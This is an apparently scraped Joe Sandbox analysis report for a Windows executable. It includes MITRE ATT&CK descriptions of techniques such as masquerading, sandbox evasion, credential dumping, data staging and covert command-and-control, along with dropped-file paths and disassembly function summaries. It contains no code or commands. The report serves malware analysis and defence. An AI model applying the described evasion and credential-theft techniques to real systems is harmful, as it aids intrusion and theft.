Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 64Tgzu2FKh.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\rheu[1].bin

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Quarrelers.Cod

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\Postpyloric6.Ann

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\bn.txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\find-location-symbolic.svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\network-cellular-symbolic.svg

C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
64Tgzu2FKh.exe

Function 0040333D Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Function 004053EF Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 0040595A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 0040658F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00403D08 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 0040626E Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre